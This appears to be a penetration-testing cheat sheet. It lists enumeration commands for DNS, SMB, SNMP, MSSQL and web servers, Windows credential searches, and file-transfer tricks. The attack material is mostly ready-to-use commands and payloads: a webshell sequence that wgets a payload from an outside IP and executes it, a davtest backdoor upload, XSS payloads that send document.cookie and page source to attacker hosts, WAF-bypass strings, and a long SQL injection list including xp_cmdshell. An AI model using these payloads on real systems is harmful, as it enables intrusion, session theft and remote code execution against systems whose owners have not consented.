Perform MX Record Lookup dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG dig axfr domain-name-here.com @nameserver
DNS Zone Transfers Windows DNS zone transfer
nslookup -> set type=any -> ls -d blah.com
Linux DNS zone transfer
dig axfr blah.com @ns1.blah.com
Dnsrecon DNS Brute Force dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml
Dnsrecon DNS List of megacorp dnsrecon -d megacorpone.com -t axfr
DNSEnum dnsenum zonetransfer.me
NMap Enumeration Script List:
NMap Discovery https://nmap.org/nsedoc/categories/discovery.html
Nmap port version detection MAXIMUM power nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p
NFS (Network File System) Enumeration
Show Mountable NFS Shares nmap -sV --script=nfs-showmount $ip RPC (Remote Procedure Call) Enumeration
Connect to an RPC share without a username and password and enumerate privledges rpcclient --user="" --command=enumprivs -N $ip
Connect to an RPC share with a username and enumerate privledges rpcclient --user="" --command=enumprivs $ip
SMB Enumeration
SMB OS Discovery nmap $ip --script smb-os-discovery.nse
Nmap port scan nmap -v -p 139,445 -oG smb.txt $ip-254
Netbios Information Scanning nbtscan -r $ip/24
Nmap find exposed Netbios servers nmap -sU --script nbstat.nse -p 137 $ip
Nmap all SMB scripts scan
nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
Nmap all SMB scripts authenticated scan
nmap -sV -Pn -vv -p 445 --script-args smbuser=,smbpass= --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip
SMB Enumeration Tools nmblookup -A $ip
smbclient //MOUNT/share -I $ip -N
rpcclient -U "" $ip
enum4linux $ip
enum4linux -a $ip
SMB Finger Printing smbclient -L //$ip
Nmap Scan for Open SMB Shares nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24
Nmap scans for vulnerable SMB Servers nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip
Nmap List all SMB scripts installed ls -l /usr/share/nmap/scripts/smb*
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14
OR
python /usr/share/doc/python-impacket-doc/examples /samrdump.py $ip
RID Cycling - Null Sessions ridenum.py $ip 500 50000 dict.txt
Manual Null Session Testing
Windows: net use \$ip\IPC$ "" /u:""
Linux: smbclient -L //$ip
SMTP Enumeration - Mail Severs
Verify SMTP port using Netcat nc -nv $ip 25
SNMP Enumeration -Simple Network Management Protocol
Fix SNMP output values so they are human readable apt-get install snmp-mibs-downloader download-mibs echo "" > /etc/snmp/snmp.conf
SNMP Enumeration Commands
snmpcheck -t $ip -c public
snmpwalk -c public -v1 $ip 1|
grep hrSWRunName|cut -d* * -f
snmpenum -t $ip
onesixtyone -c names -i hosts
SNMPv3 Enumeration nmap -sV -p 161 --script=snmp-info $ip/24
Automate the username enumeration process for SNMPv3: apt-get install snmp snmp-mibs-downloader wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
SNMP Default Credentials /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
MS SQL Server Enumeration
Nmap Information Gathering
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
List all SUID files find / -perm -4000 2>/dev/null
Determine the current version of Linux cat /etc/issue
Determine more information about the environment uname -a
List processes running ps -xaf
List the allowed (and forbidden) commands for the invoking use sudo -l
List iptables rules iptables --table nat --list iptables -vL -t filter iptables -vL -t nat iptables -vL -t mangle iptables -vL -t raw iptables -vL -t security
net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
findstr /si password *.xml *.ini *.txt
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Search for folders with gobuster: gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
OWasp DirBuster - Http folder enumeration - can take a dictionary file
Dirb - Directory brute force finding using a dictionary file dirb http://$ip/ wordlist.dict dirb http://vm/
Dirb against a proxy
dirb http://$ip/ -p $ip:3129
Nikto nikto -h $ip
HTTP Enumeration with NMAP nmap --script=http-enum -p80 -n $ip/24
Nmap Check the server methods nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Get Options available from web server curl -vX OPTIONS vm/test
Uniscan directory finder: uniscan -qweds -u http://vm/
Wfuzz - The web brute forcer
wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test
wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ
Recurse level 3
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ
Open a service using a port knock (Secured with Knockd) for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x server_ip_address; done
WordPress Scan - Wordpress security scanner
wpscan --url $ip/blog --proxy $ip:3129 RSH Enumeration - Unencrypted file transfer system
auxiliary/scanner/rservices/rsh_login Finger Enumeration
finger @$ip
finger batman@$ip
TLS & SSL Testing
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U $ip | aha > OUTPUT-FILE.html Proxy Enumeration (useful for open proxies)
nikto -useproxy http://$ip:3128 -h $ip Steganography
apt-get install steghide
steghide extract -sf picture.jpg
steghide info picture.jpg
apt-get install stegosuite
The OpenVAS Vulnerability Scanner
apt-get update apt-get install openvas openvas-setup
netstat -tulpn
Login at: https://$ip:9392
Post exploitation refers to the actions performed by an attacker, once some level of control has been gained on his target.
Simple Local Web Servers
Run a basic http server, great for serving up shells etc python -m SimpleHTTPServer 80
Run a basic Python3 http server, great for serving up shells etc python3 -m http.server
Run a ruby webrick basic http server ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start"
Run a basic PHP http server php -S $ip:80
Creating a wget VB Script on Windows: https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt
Windows file transfer script that can be pasted to the command line. File transfers to a Windows machine can be tricky without a Meterpreter shell. The following script can be copied and pasted into a basic windows reverse and used to transfer files from a web server (the timeout 1 commands are required after each new line):
echo Set args = Wscript.Arguments >> webdl.vbs timeout 1 echo Url = "http://1.1.1.1/windows-privesc-check2.exe" >> webdl.vbs timeout 1 echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> webdl.vbs timeout 1 echo dim bStrm: Set bStrm = createobject("Adodb.Stream") >> webdl.vbs timeout 1 echo xHttp.Open "GET", Url, False >> webdl.vbs timeout 1 echo xHttp.Send >> webdl.vbs timeout 1 echo with bStrm >> webdl.vbs timeout 1 echo .type = 1 ' >> webdl.vbs timeout 1 echo .open >> webdl.vbs timeout 1 echo .write xHttp.responseBody >> webdl.vbs timeout 1 echo .savetofile "C:\temp\windows-privesc-check2.exe", 2 ' >> webdl.vbs timeout 1 echo end with >> webdl.vbs timeout 1 echo The file can be run using the following syntax:
C:\temp\cscript.exe webdl.vbs
Mounting File Shares
Mount NFS share to /mnt/nfs mount $ip:/vol/share /mnt/nfs HTTP Put nmap -p80 $ip --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
Uploading Files SCP
scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
scp localfile username@$ip:~/Folder/
scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~
Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
davtest -move -sendbd auto -url http://$ip
https://github.com/cldrn/davtest
You can also upload a file using the PUT method with the curl command:
curl -T 'leetshellz.txt' 'http://$ip'
And rename it to an executable file using the MOVE method with the curl command:
curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'
Upload shell using limited php shell cmd use the webshell to download and execute the meterpreter [curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O /tmp/evil" http://$ip/files/sh.php [curl -s --data "cmd=chmod 777 /tmp/evil" http://$ip/files/sh.php curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
TFTP mkdir /tftp atftpd --daemon --port 69 /tftp cp /usr/share/windows-binaries/nc.exe /tftp/ EX. FROM WINDOWS HOST: C:\Users\Offsec>tftp -i $ip get nc.exe
FTP apt-get update && apt-get install pure-ftpd
#!/bin/bash groupadd ftpgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd offsec -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth/ ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
XSS1
[ ] Tools
https://github.com/DanMcInerney/xsscrapy
https://github.com/s0md3v/XSStrike
# Cross Site Scripting detection suite equipped with parsers
# XSStrike analyses the response with multiple parsers and then crafts payloads
# that are guaranteed to work by context analysis integrated with a fuzzing engine
# Documentation
https://github.com/s0md3v/XSStrike/wiki/Usage
# Classical GET
python xsstrike.py -u "http://example.com/search.php?q=query"
# POST
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
# Path payloads
python xsstrike.py -u "http://example.com/search/form/query" --path
# Crawl and test
python xsstrike.py -u "http://example.com/page.php" --crawl
# Load payloads from file and test them
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
# Find hidden parameters
python xsstrike.py -u "http://example.com/page.php" --params
[ ] automate Rxss
method uniq
https://github.com/yavolo/eventlistener-xss-reconfirst method
- collect a sub domain (AssetFinder - SubFinder – Amass – Find-domain - Google Dorking)
- find the number of sub-domains which are active ( `httprobe (Tomnomnom) – HTTPX ) >> cat subdomains.txt | httprobe | tee -a host.txt
- use your payloads :`` <script/src=//NJ.₨></script>
- your report if not acceptd
- cat host.txt | crawler | tee -a endpoint.txt & cat host.txt | waybackurl | tee -a endpoint.txt
- After finding all the 50 Lakh endpoint I started to fuzz all the parameters to find xss vulnerability with the help of the tool qsreplace. The command used was:
cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt
- After executing the command now, I had to check the number of parameters have been reflecting our payload into a plain text weather or not, So I created a tool named FREQ which is also available in my GitHub repo. So, the tool sends multiple requests to the check whether the response containing the payload return us with the affected URLs. The command used to perform this attack was:
cat xss_fuzz.txt | freq | tee -a possible_xss.txt
second method
cleanP : github.com/raoufmaklouf/c…
injectP: github.com/raoufmaklouf/i…
XSS.yaml : gist.githubusercontent.com/raoufmaklouf/7…
- single target: `gau target.com | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt
&
- cat AllEndPoint.txt | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt third method
irst of all, I enumerated all subdomains of the target.com with [subfinder](https://github.com/projectdiscovery/subfinder) and
then subdomain brute-forcing with [knockpy](https://github.com/guelfoweb/knock),
then I used [waybackurls](https://github.com/tomnomnom/waybackurls) to get parameters to test for XSS and then I used [gf](https://github.com/tomnomnom/gf) to get possible XSS parameters.
after sorting the URLs I used [KXSS](https://github.com/Emoe/kxss)
And [Dalfox](https://github.com/hahwul/dalfox). Bad luck I got nothing. Four method
https://mirror-medium.com/?m=https://medium.com/@c0nqr0r/reading-robots-txt-got-me-4-xss-reports-9fd2234c635f&fbclid=IwAR1Z9wF54pIr0l3uLd9xLxiip3gbiWPDo-CFkNaGtrM7FTrLXDBzfI8pqKw[ ] Tips
# If XSS is not executed through the UI, you can try to insert it through the API
# It can then fire on the UI. Many filters are not present like thisPayloads
# Document.location
<script>document.location('http://IP_EXTERNE/'+document.cookie)</script>
<script>document.location.href = 'http://requestb.in/XXXXXX?cookies =' + document.cookie;</script>
# Window
<script>window.open("http://monserveur/Cookie="+document.cookie)</script>
<script>window.location='http://monsite.free.fr/script.php?cookies='+(document.cookie);</script>
# Document.write
<script>document.write('<img src="https://requestb.in/xxxxx?cookie="+document.cookie>admin</img>');</script>
admin"></i>)</span><script>document.write("<img src=http://requestb.in/XXXXX?cookie=".concat(encodeURI(document.cookie)).concat("/>"))</script><i>
<script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://requestb.in/w0sw22w0', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.send(document.cookie);</script>
# alert(1) in JS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
injecting inside of input tags
<input/onfocus=alert(0) autofocus>
<input/onfocus=alert`0` autofocus>
<input/onfocus=prompt`0` autofocus>
1'"><input/onfocus={alert`1`} autofocus> # WAF Bypass
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<svg/onload=(((confirm(1))))>
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
# No HTML events
<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>
<svg><script xlink:href=data:,alert(1)>
<svg/onload=(confirm(1))>
<svg/onload=confirm(1)>
# Stealing the source code without triggering browser restrictions
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
# Non alphanumeric alert() payload
Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()
SQL INJECTION
or 1=1 --
or 3=3 --
!
"
" OR "" = "
" OR 1 = 1 -- -
" and 0=benchmark(3000000,MD5(1))%20%23
" and 0=benchmark(3000000,MD5(1))%20--
" and 0=benchmark(3000000,MD5(1))%20/*
" or "a"="a
" or 0=0 --
" or 1=1--
" or benchmark(10000000,MD5(1))#
" or isNULL(1/0) /*
" or pg_sleep(5)--
" or pg_sleep(__TIME__)--
" or sleep(5)#
" or sleep(5)="
" or sleep(__TIME__)#
" or sleep(__TIME__)="
" waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
""
")
") and 0=benchmark(3000000,MD5(1))%20%23
") and 0=benchmark(3000000,MD5(1))%20--
") and 0=benchmark(3000000,MD5(1))%20/*
") or benchmark(10000000,MD5(1))#
") or pg_sleep(5)--
") or pg_sleep(__TIME__)--
") or sleep(5)="
") or sleep(__TIME__)="
") waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
"))
")) and 0=benchmark(3000000,MD5(1))%20%23
")) and 0=benchmark(3000000,MD5(1))%20--
")) and 0=benchmark(3000000,MD5(1))%20/*
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(5)--
")) or pg_sleep(__TIME__)--
")) or sleep(5)="
")) or sleep(__TIME__)="
")) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
")))
"))) and 0=benchmark(3000000,MD5(1))%20%23
"))) and 0=benchmark(3000000,MD5(1))%20--
"))) and 0=benchmark(3000000,MD5(1))%20/*
"))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
")))) and 0=benchmark(3000000,MD5(1))%20%23
")))) and 0=benchmark(3000000,MD5(1))%20--
")))) and 0=benchmark(3000000,MD5(1))%20/*
")))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
"));waitfor delay '0:0:5'--
"));waitfor delay '0:0:__TIME__'--
");
");waitfor delay '0:0:5'--
");waitfor delay '0:0:__TIME__'--
";
";waitfor delay '0:0:5'--
";waitfor delay '0:0:__TIME__'--
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
# Hash comment
# Numeric
# from wapiti
#NAME?
% wildcard attribute indicator
%"
%")
%'
%' AND 8310=8310 AND '%'='
%' AND 8310=8311 AND '%'='
%')
%00
%20$(sleep%2050)
%20'sleep%2050'
%20or%20''='
%20or%20'x'='x
%20or%201=1
%20or%20x=x
%21
%26
%27%20or%201=1
%28
%29
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%2A%7C
%2c(select%20*%20from%20(select(sleep(10)))a)
%7C
&
&&SLEEP(5)
&&SLEEP(5)#
&&SLEEP(5)--
'%20OR
'
' (select top 1
' AND MID(VERSION(),1,1) = '5';
' AND id IS NULL; --
' AnD SLEEP(5) ANd '1
' GROUP BY columnnames having 1=1 --
' OR '' = '
' OR '1
' OR 'x'='x
' OR 1 -- -
' UNION ALL SELECT
' UNION SELECT
' UNION SELECT sum(columnname ) from tablename --
' and 0=benchmark(3000000,MD5(1))%20%23
' and 0=benchmark(3000000,MD5(1))%20--
' and 0=benchmark(3000000,MD5(1))%20/*
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --
' or "
' or ''='
' or '1'='1'--
' or (EXISTS)
' or 0=0 #
' or 0=0 --
' or 1 --'
' or 1=1
' or 1=1 or ''='
' or 1=1--
' or 3=3
' or 3=3 --
' or a=a--
' or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
' or pg_sleep(__TIME__)--
' or sleep(5)#
' or sleep(5)='
' or sleep(__TIME__)#
' or sleep(__TIME__)='
' or uid like '%
' or uname like '%
' or user like '%
' or userid like '%
' or username like '%
' waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
'"
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
'&&SLEEP(5)&&'1
''
'''''''''''''UNION SELECT '2
')
') and 0=benchmark(3000000,MD5(1))%20%23
') and 0=benchmark(3000000,MD5(1))%20--
') and 0=benchmark(3000000,MD5(1))%20/*
') or ('a'='a
') or benchmark(10000000,MD5(1))#
') or pg_sleep(5)--
') or pg_sleep(__TIME__)--
') or sleep(5)='
') or sleep(__TIME__)='
') waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
')%20or%20('x'='x
'))
')) and 0=benchmark(3000000,MD5(1))%20%23
')) and 0=benchmark(3000000,MD5(1))%20--
')) and 0=benchmark(3000000,MD5(1))%20/*
')) or benchmark(10000000,MD5(1))#
')) or pg_sleep(5)--
')) or pg_sleep(__TIME__)--
')) or sleep(5)='
')) or sleep(__TIME__)='
')) waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
'))) and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20--
'))) and 0=benchmark(3000000,MD5(1))%20/*
'))) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
')))) and 0=benchmark(3000000,MD5(1))%20%23
')))) and 0=benchmark(3000000,MD5(1))%20--
')))) and 0=benchmark(3000000,MD5(1))%20/*
')))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
'));waitfor delay '0:0:5'--
'));waitfor delay '0:0:__TIME__'--
');waitfor delay '0:0:5'--
');waitfor delay '0:0:__TIME__'--
';
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
';WAITFOR DELAY '0:0:30'--
';waitfor delay '0:0:5'--
';waitfor delay '0:0:__TIME__'--
'='
'=0--+
'LIKE'
'\"
'hi' or 'x'='x';
'sqlattempt1
'||UTL_HTTP.REQUEST
(
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--
(select top 1
(sqlattempt2)
(sqlvuln)
(||6)
)
) and 0=benchmark(3000000,MD5(1))%20%23
) and 0=benchmark(3000000,MD5(1))%20--
) and 0=benchmark(3000000,MD5(1))%20/*
) or ('a'='a
) or (a=a
) or benchmark(10000000,MD5(1))#
) or benchmark(10000000,MD5(1))#"
) or pg_sleep(__TIME__)--
) or sleep(__TIME__)=
) or sleep(__TIME__)='
) union select * from information_schema.tables;
) waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
)%20or%20('x'='x
)) and 0=benchmark(3000000,MD5(1))%20%23
)) and 0=benchmark(3000000,MD5(1))%20--
)) and 0=benchmark(3000000,MD5(1))%20/*
)) or benchmark(10000000,MD5(1))#
)) or pg_sleep(__TIME__)--
)) or pg_sleep(__TIME__)--"
)) or sleep(__TIME__)="""
)) or sleep(__TIME__)='
)) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
))) and 0=benchmark(3000000,MD5(1))%20%23
))) and 0=benchmark(3000000,MD5(1))%20--
))) and 0=benchmark(3000000,MD5(1))%20/*
))) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
)))) and 0=benchmark(3000000,MD5(1))%20%23
)))) and 0=benchmark(3000000,MD5(1))%20--
)))) and 0=benchmark(3000000,MD5(1))%20/*
)))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
));waitfor delay '0:0:5'--
));waitfor delay '0:0:__TIME__'--
);waitfor delay '0:0:5'--
);waitfor delay '0:0:__TIME__'--
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+ addition, concatenate (or space in url)
+ SLEEP(10) + '
+benchmark(3200,SHA1(1))+'
+sqlvuln
,
,(select * from (select(sleep(10)))a)
,@variable
--
-- &password=
-- - SQL comment
-- or #
--sp_password
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
-1' UNION SELECT 1,2,3--+
-2
/
/* C-style comment
/**/or/**/1/**/=/**/1
/*…*/
//
//*
0
0 or 1=1
0x730065006c0065006300740020004000400076006500 ...
0x770061006900740066006F0072002000640065006C00 ...
0x77616974666F722064656C61792027303A303A313027 ...
1 AND (SELECT * FROM Users) = 1
1 or 1=1
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1 or pg_sleep(__TIME__)--
1 or sleep(5)#
1 or sleep(__TIME__)#
1 waitfor delay '0:0:10'--
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
1' ORDER BY 1,2,3--+
1' ORDER BY 1,2--+
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(5)--
1) or pg_sleep(__TIME__)--
1) or sleep(5)#
1) or sleep(__TIME__)#
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(5)--
1)) or pg_sleep(__TIME__)--
1)) or sleep(5)#
1)) or sleep(__TIME__)#
1*56
1-false
1-true
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1;SELECT%20*
21 %
21%
23 OR 1=1
26 %
26%
28 %
28%
29 %
29%
3.10E+17
;
; begin declare @var varchar(8000) set @var=' ...
; exec ('sel' + 'ect us' + 'er')
; exec master..xp_cmdshell
; exec master..xp_cmdshell 'ping 172.10.1.255'--
; exec xp_regread
; execute immediate 'sel' || 'ect us' || 'er'
; or '1'='1'
;%00 Nullbyte
;waitfor delay '0:0:5'--
;waitfor delay '0:0:__TIME__'--
<>"'%;)(&+
?
@@variable global variable
@var select @var as var into temp end --
@variable
@variable local variable
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--
AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
AND 0
AND 1
AND 1083=1083 AND ('1427=1427
AND 1083=1083 AND (1427=1427
AND 1=0
AND 1=0 AND '%'='
AND 1=0#
AND 1=0--
AND 1=1
AND 1=1 AND '%'='
AND 1=1#
AND 1=1--
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))--
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))#
AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--
